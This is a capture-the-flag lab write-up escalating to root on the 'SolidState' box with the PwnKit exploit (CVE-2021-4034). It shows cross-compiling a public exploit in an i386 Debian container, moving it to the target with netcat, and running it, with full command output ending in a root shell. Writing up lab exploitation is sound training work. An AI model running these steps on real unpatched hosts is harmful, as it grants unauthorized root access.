InfoSec LAB

SolidState_Privilege_Escalation_2

Created: 3 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034 The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit)

I Found an exploit online

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ gcc
bash: gcc: command not found

The target system does not have a compiler. Compilation has to be done remotely

Docker Exploit Development

The target system is Debian 9 withi686 architecture, which is a version of the x86 architecture family

i was unable to find a i686 version of debian 9 image on dockerhub however, i found a i386 version, which still has x86 architecture. Just older.

There should be a problem with the compilation.

┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ docker run -it --entrypoint "/bin/bash" --name deb9_i386 i386/debian:9
unable to find image 'i386/debian:9' locally
9: Pulling from i386/debian
198ad075a14b: Pull complete 
digest: sha256:5be6b5853a13d413e4ef557ed1cbf6cf0ba4896769c7c37422fada653e0cdee5
status: Downloaded newer image for i386/debian:9

Creating a docker container with a i386 version of Debian 9 image

root@b860970089e6:/# dpkg --print-architecture
i386
 
root@b860970089e6:~# ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Once inside, I need to confirm the architecture and version of glibc, which should match that of the target system

root@b860970089e6:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Then proceed to update the repo and install the necessary tools

root@b860970089e6:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.

Grab the exploit package

root@b860970089e6:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.

Compile

root@b860970089e6:~/CVE-2021-4034# cd ../ ; tar -czvf CVE-2021-4034.tar.gz CVE-2021-4034

Archive the directory that contains the compiled exploit for transport

root@b860970089e6:~# nc 10.10.10.51 2222 < CVE-2021-4034.tar.gz

Ship the archive to the target system

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
listening on [any] 2222 ...
connect to [10.10.10.51] from (UNKNOWN) [10.10.14.5] 43456

Receive the archive from a Netcat listener

Exploitation

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Extract the directory from the archive and head in to it

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
solidstate
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:3e:11 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:3e11/64 scope global mngtmpaddr dynamic 
       valid_lft 86395sec preferred_lft 14395sec
    inet6 fe80::250:56ff:feb9:3e11/64 scope link 
       valid_lft forever preferred_lft forever

Execute the exploit

System Level Compromise

Interactive Graph View

Backlinks